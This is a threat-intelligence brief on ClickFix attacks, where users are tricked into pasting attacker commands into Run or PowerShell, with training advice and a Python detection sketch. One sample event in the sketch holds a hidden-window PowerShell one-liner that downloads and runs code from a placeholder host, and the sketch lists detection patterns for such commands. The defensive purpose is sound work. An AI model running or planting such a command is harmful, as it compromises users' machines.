INTEL-18: ClickFix: When the User Becomes the Exploit
Posted on April 23, 2026 • 3 min read • 576 words
ClickFix became the malware proliferation method of choice in 2025 — and it bypasses nearly every technical email control you’ve paid for.
Intel 471 tracks ClickFix as the dominant delivery pattern of 2025. The mechanic is almost insultingly simple:
- A victim lands on a crafted page (often via malvertising, SEO poisoning, or a fake verification overlay).
- The page instructs them to press Win+R → Ctrl+V → Enter — or the equivalent sequence in PowerShell or Terminal.
- The command they just pasted — pre-staged by the attacker on their clipboard — runs with the user’s privileges, in their session, on their device.
There is no malicious attachment for your sandbox to detonate. No malicious URL for your filter to block — the URL being visited is the attacker’s page, but the payload arrives through the user’s own hands. Every technical email control becomes irrelevant at the moment the user follows instructions.
The underground-market pricing confirms it has industrialized: full ClickFix phishing kits trade at $1,500–$2,000 per page, with named vendors advertising tailored variants for cracked-software lures, Cloudflare-themed overlays, and multilingual targeting. This is a product, not a novel technique.
Traditional phishing tells — typos, odd tone, mismatched domains — don’t apply. The victim isn’t being deceived about who sent an email. They’re being given a plausible technical instruction and asked to execute it themselves.
Why It Matters
ClickFix flips the detection surface. Email security, web gateways, URL reputation, and attachment sandboxing are all upstream of the compromise event. The compromise happens when the user pastes a string into Run, PowerShell, or Terminal — which is a legitimate action that security tooling is not designed to block.
This isn’t a filter problem. It’s a training problem and a behavioral-detection problem — and it has a cleaner decision point than any phishing variant in the last decade. There is exactly one sentence between your employees and a ClickFix infection, and most of your workforce has never heard it.
What To Do — One Key Action
Teach one line, everywhere, this quarter:
“No legitimate website, IT team, or CAPTCHA ever asks me to paste a command into Run, PowerShell, or my terminal. If I’m being asked to do that, I stop and report it.”
Ship it as a 60-second briefing — no LMS module required. Include it in onboarding. Put it on the back of the badge. Then back it with a behavioral detection: alert on unusual clipboard → Run (Win+R) → cmd/powershell execution patterns, especially from non-developer endpoints. Most EDR vendors support this now; most organizations haven’t turned it on.
One sentence. One detection. It closes the dominant 2025 delivery method.
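As an added example (not code from the brief or from Intel 471), the behavioral detection described above, sketched in Python over constructed Sysmon-style process-creation events: explorer.exe (the parent of anything launched from the Run dialog) spawning a shell, command-line markers typical of pasted one-liners, and the non-developer-endpoint weighting. The host names, the developer-host set, the field names and the sample events are all assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 / EDR shape; not real telemetry.
EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"host": "HR-LAPTOP-07", "parent": EXPLORER, "image": PS,          # pasted one-liner
     "cmdline": 'powershell.exe -w hidden -c "iex (irm https://lure.invalid/verify)"'},
    {"host": "DEV-WS-01", "parent": EXPLORER, "image": PS,             # developer opening a shell
     "cmdline": "powershell.exe"},
    {"host": "FIN-DESKTOP-12", "parent": EXPLORER, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig /all"},                           # help-desk-style check
    {"host": "HR-LAPTOP-07", "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},     # scheduled task, not Run
]

# Hypothetical asset split: hosts expected to run interactive shells score lower.
DEVELOPER_HOSTS = {"DEV-WS-01", "DEV-WS-02"}
# Interpreters the Run dialog is typically used to launch.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line markers that are rare when typed by hand but common in pasted one-liners.
SUSPICIOUS_ARGS = [
    r"-w(?:indowstyle)?\s+hidden",                                     # hidden window
    r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",                     # base64 argument
    r"\b(?:iex|invoke-expression)\b",                                  # in-memory execution
    r"\b(?:irm|invoke-restmethod|invoke-webrequest|downloadstring)\b",  # remote fetch
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons); 0 means the event is not the Run-dialog -> interpreter shape."""
    if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in SHELL_IMAGES:
        return 0, []
    reasons = ["explorer.exe spawned " + basename(ev["image"])]
    hits = [p for p in SUSPICIOUS_ARGS if re.search(p, ev["cmdline"], re.IGNORECASE)]
    reasons += ["cmdline matches " + p for p in hits]
    score = 1 + 2 * len(hits)
    if ev["host"].upper() not in DEVELOPER_HOSTS:
        score += 2                                 # the brief's non-developer-endpoint weighting
        reasons.append("non-developer endpoint")
    return score, reasons

def triage(events, threshold=4):
    """Return (host, score, reasons) for every event that clears the alert threshold."""
    scored = ((ev["host"],) + score_event(ev) for ev in events)
    return [t for t in scored if t[1] >= threshold]
```

Calling triage(EVENTS) flags only the HR laptop; the developer's bare shell and the finance desktop's ipconfig stay below the threshold, which is the point of weighting by endpoint role rather than alerting on every Run-dialog shell.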
MITRE ATT&CK
- T1204.004 — User Execution: Malicious Copy and Paste: Primary technique — user is socially engineered into pasting attacker-staged commands
- T1059.001 — Command and Scripting Interpreter: PowerShell: Most common execution path once the command is pasted
- T1059.003 — Command and Scripting Interpreter: Windows Command Shell: Secondary execution path via Run → cmd.exe
- T1204.001 — User Execution: Malicious Link: The upstream delivery — malvertising or SEO-poisoned lure pages
Learn More
- Intel 471 — 2026 Cyber Threat Trends & Outlook Report — Primary source
- FIR Risk Tuesday E88 — The Trust Audit — Full dual-report analysis
- FIR Risk INTEL-5 — Microsoft Identity Trust Exploitation — Related trust-surface abuse
- FIR Risk INTEL-8 — Voice Phishing Surge — Related social-engineering delivery
Powered by FIR Risk Platform — AI-driven threat intelligence for enterprise risk leaders.